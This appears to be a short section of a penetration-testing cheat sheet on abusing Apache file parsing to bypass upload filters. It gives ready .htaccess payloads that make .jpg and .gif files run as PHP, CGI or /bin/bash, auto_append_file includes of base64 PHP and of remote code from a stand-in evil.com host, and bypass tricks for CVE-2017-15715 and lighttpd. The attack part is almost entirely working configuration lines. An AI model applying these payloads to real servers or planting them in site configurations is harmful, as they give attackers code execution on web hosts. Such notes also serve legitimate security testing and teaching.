4.15.2. Apache

4.15.2.1. Suffix parsing

test.php.x1.x2.x3 (x1,x2,x3 are file types not defined in the mime.types file). Apache will judge the suffix from right to left. If x3 is a non-identifiable suffix, it will judge x2 until a identifiable suffix is ​​found, and then parse the identifiable suffix.

4.15.2.2. .htaccess

When AllowOverride is enabled, upload .htaccess with parsing rules enabled

AddType application/x-httpd-php .jpg

php_value auto_append_file .htaccess
#<?php phpinfo();

Options ExecCGI
AddHandler cgi-script .jpg

Options +ExecCGI
AddHandler fcgid-script .gif
FcgidWrapper "/bin/bash" .gif

php_flag allow_url_include 1
php_value auto_append_file data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw==
#php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B
#php_value auto_append_file https://evil.com/evil-code.txt

4.15.2.3. Directory Traversal

Apache has a directory traversal vulnerability during configuration Options +Indexes .

4.15.2.4. CVE-2017-15715

%0A Bypass upload blacklist.

4.15.2.5. lighttpd

xx.jpg/xx.php

4.15.2.6. Reference Links

• Apache upload bypass